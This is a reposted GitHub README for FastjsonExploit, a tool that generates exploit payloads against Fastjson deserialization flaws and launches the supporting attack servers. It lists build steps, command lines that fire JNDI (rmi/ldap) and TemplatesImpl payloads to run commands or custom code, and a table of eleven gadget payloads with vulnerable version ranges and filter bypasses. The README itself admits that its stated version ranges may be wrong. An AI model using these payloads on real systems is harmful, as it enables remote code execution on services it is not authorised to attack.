GitHub - c0ny1/FastjsonExploit: Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)
2019-07-23 13:49:04 Author: github.com(查看原文) 阅读量:250 收藏

0x01 Introduce

FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:

  1. 一键生成利用payload,并启动所有利用环境。
  2. 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)

0x02 Buiding

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

0x03 Usage



.---- -. -. .  .   .
   ( .',----- - - ' '
    \_/      ;--:-\         __--------------------__
   __U__n_^_''__[. |ooo___  | |_!_||_!_||_!_||_!_| |
 c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
 ,_\___________'_|,L______],|______________________|
/;_(@)(@)==(@)(@)   (o)(o)      (o)^(o)--(o)^(o)

FastjsonExploit is a Fastjson library vulnerability exploit framework
                Author:c0ny1<[email protected]>


Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

Available payload types:
    Payload                PayloadType VulVersion      Dependencies                                      
    -------                ----------- ----------      ------------                                      
    BasicDataSource1       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
    BasicDataSource2       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
    JdbcRowSetImpl1        jndi        1.2.2.1-1.2.2.4                                                   
    JdbcRowSetImpl2        jndi        1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass                            
    JdbcRowSetImpl3        jndi        1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass                            
    JdbcRowSetImpl4        jndi        1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass                            
    JdbcRowSetImpl5        jndi        1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass                            
    JndiDataSourceFactory1 jndi        1.2.2.1-1.2.2.4 ibatis-core:3.0                                   
    SimpleJndiBeanFactory1 jndi        1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE                      
    TemplatesImpl1         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)   
    TemplatesImpl2         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)  

0x04 Notice

  • 帮助信息所说明的payload可利用的Fastjson版本,不一定正确。后续测试更正!

0x05 Reference


文章来源: https://github.com/c0ny1/FastjsonExploit
如有侵权请联系:admin#unsafe.sh